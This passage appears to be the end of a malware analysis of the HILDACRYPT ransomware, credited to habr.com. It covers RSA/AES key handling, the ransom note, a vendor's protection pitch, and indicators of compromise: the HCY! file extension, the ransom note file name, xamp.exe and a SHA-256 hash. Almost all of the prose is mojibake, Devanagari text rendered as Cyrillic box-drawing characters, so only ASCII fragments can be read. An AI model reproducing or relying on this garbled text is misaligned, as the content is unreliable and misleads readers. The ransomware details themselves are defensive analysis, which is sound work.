AES рдлрд╛рдЗрд▓ рдХреА рдПрдирдХреНрд░рд┐рдкреНрдЯ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА RSA рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреА рд╡рд╛рдкрд░рд▓реА рдЬрд╛рддреЗ. RSA рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреА рдмреЗрд╕64 рдПрдиреНрдХреЛрдб рдХреЗрд▓реЗрд▓реА рдЖрд╣реЗ рдЖрдгрд┐ рддреНрдпрд╛рдд рдореЙрдбреНрдпреВрд▓рд╕ рдЖрдгрд┐ 65537 рдЪрд╛ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдШрд╛рддрд╛рдВрдХ рдЕрд╕рддреЛ. рдбрд┐рдХреНрд░рд┐рдкреНрд╢рдирд╕рд╛рдареА RSA рдЦрд╛рдЬрдЧреА рдХреА рдЖрд╡рд╢реНрдпрдХ рдЕрд╕рддреЗ, рдЬреА рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдХрдбреЗ рдЕрд╕рддреЗ.
RSA рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдирдВрддрд░, AES рдХреА рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдлрд╛рдИрд▓рдордзреНрдпреЗ рд╕рдВрдЧреНрд░рд╣рд┐рдд Base64 рд╡рд╛рдкрд░реВрди рдПрдиреНрдХреЛрдб рдХреЗрд▓реА рдЬрд╛рддреЗ.
рдЦрдВрдбрдгреАрдЪрд╛ рд╕рдВрджреЗрд╢
рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдкреВрд░реНрдг рдЭрд╛рд▓реНрдпрд╛рд╡рд░, HILDACRYPT html рдлрд╛рдИрд▓ рддреНрдпрд╛ рдлреЛрд▓реНрдбрд░рдордзреНрдпреЗ рд▓рд┐рд╣рд┐рддреЗ рдЬреНрдпрд╛рдордзреНрдпреЗ рддреНрдпрд╛рдиреЗ рдлрд╛рдЗрд▓реНрд╕ рдПрдирдХреНрд░рд┐рдкреНрдЯ рдХреЗрд▓реНрдпрд╛ рдЖрд╣реЗрдд. рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рдиреЛрдЯрд┐рдлрд┐рдХреЗрд╢рдирдордзреНрдпреЗ рджреЛрди рдИрдореЗрд▓ рдкрддреНрддреЗ рдЕрд╕рддрд╛рдд рдЬреЗрдереЗ рдкреАрдбрд┐рдд рд╡реНрдпрдХреНрддреА рд╣рд▓реНрд▓реЗрдЦреЛрд░рд╛рд╢реА рд╕рдВрдкрд░реНрдХ рд╕рд╛рдзреВ рд╢рдХрддреЗ.
рдЦрдВрдбрдгреАрдЪреНрдпрд╛ рд╕реВрдЪрдиреЗрдордзреНрдпреЗ тАЬрдиреЛ рд▓реЛрд▓реА рд╕реБрд░рдХреНрд╖рд┐рдд рдирд╛рд╣реА;)тАЭ рд╣реА рдУрд│ рджреЗрдЦреАрд▓ рдЖрд╣реЗ - рдЬрдкрд╛рдирдордзреНрдпреЗ рдмрдВрджреА рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рд▓рд╣рд╛рди рдореБрд▓реАрдВрдЪреНрдпрд╛ рджреЗрдЦрд╛рд╡реНрдпрд╛рд╕рд╣ рдЕреЕрдирд┐рдо рдЖрдгрд┐ рдорд╛рдВрдЧрд╛ рдкрд╛рддреНрд░рд╛рдВрдЪрд╛ рд╕рдВрджрд░реНрдн.
рдирд┐рд╖реНрдХрд░реНрд╖
HILDACRYPT, рдирд╡реАрди рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░ рдХреБрдЯреБрдВрдмрд╛рдиреЗ рдирд╡реАрди рдЖрд╡реГрддреНрддреА рдЬрд╛рд░реА рдХреЗрд▓реА рдЖрд╣реЗ. рдПрдирдХреНрд░рд┐рдкреНрд╢рди рдореЙрдбреЗрд▓ рдкреАрдбрд┐рдд рд╡реНрдпрдХреНрддреАрд▓рд╛ рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░рджреНрд╡рд╛рд░реЗ рдПрдирдХреНрд░рд┐рдкреНрдЯ рдХреЗрд▓реЗрд▓реНрдпрд╛ рдлрд╛рдЗрд▓реНрд╕ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рдгреНрдпрд╛рдкрд╛рд╕реВрди рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдХрд░рддреЗ. рдХреНрд░рд┐рдкреНрдЯреЛрд▓реЙрдХрд░ рдмреЕрдХрдЕрдк рд╕рд┐рд╕реНрдЯрдо рдЖрдгрд┐ рдЕрдБрдЯреАрд╡реНрд╣рд╛рдпрд░рд╕ рд╕реЛрд▓реНрдпреВрд╢рдиреНрд╕рд╢реА рд╕рдВрдмрдВрдзрд┐рдд рд╕рдВрд░рдХреНрд╖рдг рд╕реЗрд╡рд╛ рдЕрдХреНрд╖рдо рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рд╕рдХреНрд░рд┐рдп рд╕рдВрд░рдХреНрд╖рдг рдкрджреНрдзрддреА рд╡рд╛рдкрд░рддреЗ. HILDACRYPT рдЪреЗ рд▓реЗрдЦрдХ Netflix рд╡рд░ рджрд░реНрд╢рд╡рд┐рд▓реЗрд▓реНрдпрд╛ Hilda рдпрд╛ рдЕреЕрдирд┐рдореЗрдЯреЗрдб рдорд╛рд▓рд┐рдХреЗрдЪреЗ рдЪрд╛рд╣рддреЗ рдЖрд╣реЗрдд, рдЬреНрдпрд╛рдЪреНрдпрд╛ рдЯреНрд░реЗрд▓рд░рдЪреА рд▓рд┐рдВрдХ рдкреНрд░реЛрдЧреНрд░рд╛рдордЪреНрдпрд╛ рдорд╛рдЧреАрд▓ рдЖрд╡реГрддреНрддреАрд╕рд╛рдареА рдЦрд░реЗрджреА рдкрддреНрд░рд╛рдд рд╕рдорд╛рд╡рд┐рд╖реНрдЯ рд╣реЛрддреА.
рдиреЗрд╣рдореА рдкреНрд░рдорд╛рдгреЗ, ╨╕ HILDACRYPT ransomware рдкрд╛рд╕реВрди рддреБрдордЪреНрдпрд╛ рд╕рдВрдЧрдгрдХрд╛рдЪреЗ рд╕рдВрд░рдХреНрд╖рдг рдХрд░реВ рд╢рдХрддреЗ рдЖрдгрд┐ рдкреНрд░рджрд╛рддреНрдпрд╛рдВрдХрдбреЗ рддреНрдпрд╛рдВрдЪреНрдпрд╛ рдЧреНрд░рд╛рд╣рдХрд╛рдВрдЪреЗ рд╕рдВрд░рдХреНрд╖рдг рдХрд░рдгреНрдпрд╛рдЪреА рдХреНрд╖рдорддрд╛ рдЖрд╣реЗ . рдпрд╛ рдЙрдкрд╛рдпрд╛рдВрдордзреНрдпреЗ рд╕рдорд╛рд╡рд┐рд╖реНрдЯ рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рд╡рд╕реНрддреБрд╕реНрдерд┐рддреАрджреНрд╡рд╛рд░реЗ рд╕рдВрд░рдХреНрд╖рдг рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХреЗрд▓реЗ рдЬрд╛рддреЗ рдпрд╛рдд рдХреЗрд╡рд│ рдмреЕрдХрдЕрдкрдЪ рдирд╛рд╣реА рддрд░ рдЖрдордЪреА рдПрдХрд╛рддреНрдорд┐рдХ рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рдгрд╛рд▓реА рджреЗрдЦреАрд▓ рд╕рдорд╛рд╡рд┐рд╖реНрдЯ рдЖрд╣реЗ - рдорд╢реАрди рд▓рд░реНрдирд┐рдВрдЧ рдореЙрдбреЗрд▓рджреНрд╡рд╛рд░реЗ рд╕рдорд░реНрдерд┐рдд рдЖрдгрд┐ рд╡рд░реНрддрдирд╛рддреНрдордХ рд╣реЗрд░рд┐рд╕реНрдЯрд┐рдХреНрд╕рд╡рд░ рдЖрдзрд╛рд░рд┐рдд, рдПрдХ рддрдВрддреНрд░рдЬреНрдЮрд╛рди рдЬреЗ рд╢реВрдиреНрдп-рджрд┐рд╡рд╕рд╛рдЪреНрдпрд╛ рд░реЕрдиреНрд╕рдорд╡реЗрдЕрд░рдЪреНрдпрд╛ рдзреЛрдХреНрдпрд╛рдЪрд╛ рд╕рд╛рдордирд╛ рдХрд░рдгреНрдпрд╛рд╕ рд╕рдХреНрд╖рдо рдЖрд╣реЗ.
рддрдбрдЬреЛрдбреАрдЪреЗ рд╕рдВрдХреЗрддрдХ
рдлрд╛рдЗрд▓ рд╡рд┐рд╕реНрддрд╛рд░ HCY!
HILDACRYPReadMe.html
xamp.exe рдПрдХ рдЕрдХреНрд╖рд░ "p" рд╕рд╣ рдЖрдгрд┐ рдбрд┐рдЬрд┐рдЯрд▓ рд╕реНрд╡рд╛рдХреНрд╖рд░реА рдирд╛рд╣реА
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
рд╕реНрддреНрд░реЛрдд: www.habr.com